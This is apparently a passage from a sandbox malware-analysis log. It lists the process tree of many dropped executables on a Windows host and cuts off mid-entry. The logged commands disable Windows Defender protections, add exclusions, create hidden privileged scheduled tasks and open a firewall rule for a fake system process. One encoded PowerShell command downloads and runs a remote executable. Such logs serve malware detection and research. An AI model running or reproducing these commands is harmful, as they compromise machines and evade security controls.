C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 756
5⤵
- Program crash
PID:5260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 864
5⤵
- Program crash
PID:5368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:5640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 408
5⤵
- Program crash
PID:5668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 908
5⤵
- Program crash
PID:5400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 904
5⤵
- Program crash
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 768
5⤵
- Program crash
PID:5320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 832
5⤵
- Program crash
PID:5412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 600
5⤵
- Program crash
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 696
5⤵
- Program crash
PID:5920

C:\Users\Admin\Pictures\qE1Ygage53DPAdzJY2vlUD3M.exe
"C:\Users\Admin\Pictures\qE1Ygage53DPAdzJY2vlUD3M.exe"
5⤵
PID:5900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 356
6⤵
- Program crash
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 404
6⤵
- Program crash
PID:5996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 456
6⤵
- Program crash
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 596
6⤵
- Program crash
PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 668
6⤵
- Program crash
PID:5684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 512
6⤵
- Program crash
PID:5376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 656
6⤵
- Program crash
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 700
6⤵
- Program crash
PID:6020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 636
6⤵
- Program crash
PID:5712

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:5808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:360

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "360" "2612" "2568" "2616" "0" "0" "2620" "0" "0" "0" "0" "0"
7⤵
PID:7028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:6740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 860
6⤵
PID:4404

C:\Users\Admin\Pictures\Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
"C:\Users\Admin\Pictures\Rgl0Xw9uw8Qq3MVEIzAckRBx.exe"
4⤵
PID:424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 388
5⤵
- Program crash
PID:952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 368
5⤵
- Program crash
PID:5260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 404
5⤵
- Program crash
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 668
5⤵
- Program crash
PID:5640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 408
5⤵
- Program crash
PID:5764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 696
5⤵
- Program crash
PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 692
5⤵
- Program crash
PID:5948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 824
5⤵
- Program crash
PID:6072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 868
5⤵
- Program crash
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 908
5⤵
- Program crash
PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 720
5⤵
- Program crash
PID:5436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 896
5⤵
- Program crash
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 820
5⤵
- Program crash
PID:5612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 896
5⤵
- Program crash
PID:5676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 884
5⤵
- Program crash
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 936
5⤵
- Program crash
PID:5344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 892
5⤵
- Program crash
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 912
5⤵
- Program crash
PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 740
5⤵
- Program crash
PID:5904

C:\Users\Admin\Pictures\Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
"C:\Users\Admin\Pictures\Rgl0Xw9uw8Qq3MVEIzAckRBx.exe"
5⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 392
6⤵
- Program crash
PID:6052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 636
6⤵
- Program crash
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 672
6⤵
- Program crash
PID:5700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 680
6⤵
- Program crash
PID:5852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 784
6⤵
- Program crash
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 668
6⤵
- Program crash
PID:6032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 628
6⤵
- Program crash
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 336
6⤵
- Program crash
PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 356
6⤵
- Program crash
PID:1508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:2840

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2840" "1992" "2036" "1988" "0" "0" "2000" "0" "0" "0" "0" "0"
7⤵
PID:1192

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5300

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
6⤵
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 388
7⤵
- Program crash
PID:6856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 368
7⤵
- Program crash
PID:1688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 424
7⤵
- Program crash
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 624
7⤵
- Program crash
PID:6876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 668
7⤵
PID:5396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 700
7⤵
PID:6856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 672
7⤵
PID:6700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 760
6⤵
- Program crash
PID:1784

C:\Users\Admin\Pictures\kmxkux2GoT3nrCypkYXlLkth.exe
"C:\Users\Admin\Pictures\kmxkux2GoT3nrCypkYXlLkth.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
4⤵
PID:5420

C:\Users\Admin\Pictures\JrpWkXTknuCl5kZX2kHgOsVI.exe
"C:\Users\Admin\Pictures\JrpWkXTknuCl5kZX2kHgOsVI.exe"
4⤵
PID:5984

C:\Users\Admin\AppData\Local\Temp\7zSE975.tmp\Install.exe
.\Install.exe
5⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\7zSEC25.tmp\Install.exe
.\Install.exe /eddidzX "385118" /S
6⤵
PID:3020

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:5828

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:1776

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:4204

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:5476

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:5920

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:5304

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:3548

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:4776

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gGFZkyRpk" /SC once /ST 08:57:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:4380

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gGFZkyRpk"
7⤵
PID:4960

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gGFZkyRpk"
7⤵
PID:5272

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "beWqxOJayWvNxVgZFl" /SC once /ST 12:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\cHINCAdHgniafSxFI\EXEoyIeIwwZNnzh\eudiZze.exe\" gf /efsite_idepj 385118 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:5612

C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe
"C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe" --silent --allusers=0
4⤵
PID:6044

C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe
C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2b8,0x2bc,0x2c0,0x2b4,0x2c4,0x69fc9558,0x69fc9564,0x69fc9570
5⤵
PID:5148

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LljM0vX9AQyXiZhg9yD0OWIb.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LljM0vX9AQyXiZhg9yD0OWIb.exe" --version
5⤵
PID:5208

C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe
"C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6044 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240129121228" --session-guid=974e1967-c786-4e5b-9c69-31649d5a3b5c --server-tracking-blob=OWE0YTNiMGM5NjdmYTcyNTMxOWViMjEzODUzODhkYzk4YzJlODlhY2NjZGY4ODIwMTdkN2YzOTRlNzM4NzY2Nzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNjUzMDM0Mi41OTMyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJjMjEwNmI0My1iNTBmLTRlNmUtYjE1YS1hZmY1M2ZmYWJjOTYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4404000000000000
5⤵
PID:5372

C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe
C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2b4,0x2c4,0x2c8,0x290,0x2cc,0x696e9558,0x696e9564,0x696e9570
6⤵
PID:5392

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401291212281\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401291212281\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
5⤵
PID:1796

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401291212281\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401291212281\assistant\assistant_installer.exe" --version
5⤵
PID:6716

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401291212281\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401291212281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x24c,0x250,0x254,0x228,0xac,0xf42614,0xf42620,0xf4262c
6⤵
PID:2692

C:\Users\Admin\Pictures\Odr6TCukbApOs2Cpi0lotn3r.exe
"C:\Users\Admin\Pictures\Odr6TCukbApOs2Cpi0lotn3r.exe"
4⤵
PID:396

C:\Users\Admin\Pictures\ULQuHO4XBQEjSc5Xwr4c8Xmd.exe
"C:\Users\Admin\Pictures\ULQuHO4XBQEjSc5Xwr4c8Xmd.exe"
4⤵
PID:4232

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\Installsetup2.exe" -Force
3⤵
PID:780

C:\Users\Admin\AppData\Local\Temp\Files\dart.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dart.exe"
2⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\Files\update.exe
"C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
2⤵
PID:4216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSecurity.exe'
3⤵
PID:2424

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "WindowsSecurity" /SC ONLOGON /TR "C:\ProgramData\WindowsSecurity.exe" /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:5060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDADF.tmp.bat""
3⤵
PID:3180

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:5152

C:\Users\Public\svchost.exe
"C:\Users\Public\svchost.exe"
3⤵
PID:5116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAcAB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgB2AGkAYQB0AG8AbwBsAC4AYwBvAG0ALwBnAGUAdAAuAGUAeABlACcALAAgADwAIwBuAGsAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAdgBrACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcQBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGcAZQB0AC4AZQB4AGUAJwApACkAPAAjAHMAYwBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZQBhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAG0AcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBnAGUAdAAuAGUAeABlACcAKQA8ACMAYwB3AHUAIwA+AA=="
4⤵
PID:2360

C:\Users\Admin\AppData\Roaming\get.exe
"C:\Users\Admin\AppData\Roaming\get.exe"
5⤵
PID:2384

C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
"C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
6⤵
PID:5556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Bypass.exe'
7⤵
PID:5128

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "Bypass" /SC ONLOGON /TR "C:\Windows\System32\Bypass.exe" /RL HIGHEST
7⤵
- Creates scheduled task(s)
PID:3532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAA40.tmp.bat""
7⤵
PID:6132

C:\Windows\system32\timeout.exe
timeout 3
8⤵
- Delays execution with timeout.exe
PID:3476

C:\Windows\System32\Bypass.exe
"C:\Windows\System32\Bypass.exe"
7⤵
PID:5524

C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
6⤵
PID:4292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe'
7⤵
PID:2044

C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2044" "1648" "1592" "1644" "0" "0" "1652" "0" "0" "0" "0" "0"
8⤵
PID:7116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSecurity.exe'
7⤵
PID:5796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAdgByACMAPgA="
6⤵
PID:5412

C:\ProgramData\WindowsSecurity.exe
"C:\ProgramData\WindowsSecurity.exe"
3⤵
PID:4080

C:\Users\Admin\AppData\Local\Temp\Files\lada.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lada.exe"
2⤵
PID:3864

C:\Users\Admin\AppData\Local\Temp\Files\payload.exe
"C:\Users\Admin\AppData\Local\Temp\Files\payload.exe"
2⤵
PID:2996

C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe
"C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe"
3⤵
PID:3356

C:\Users\Admin\AppData\Local\Temp\visual-c++.exe
"C:\Users\Admin\AppData\Local\Temp\visual-c++.exe"
3⤵
PID:3388

C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe
"C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe"
2⤵
PID:164

C:\Users\Admin\AppData\Local\Temp\ghoul.exe
"C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
3⤵
PID:2384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
PID:4524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
4⤵
PID:6972

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
5⤵
- Creates scheduled task(s)
PID:4780

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
2⤵
PID:6552

C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe
"C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"
3⤵
PID:7076

C:\Users\Admin\AppData\Local\Temp\ARA.exe
"C:\Users\Admin\AppData\Local\Temp\ARA.exe"
4⤵
PID:6976

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"
5⤵
PID:4672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "
6⤵
PID:5824

C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe
"C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"
7⤵
PID:7072

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
2⤵
PID:7004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
3⤵
PID:6588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
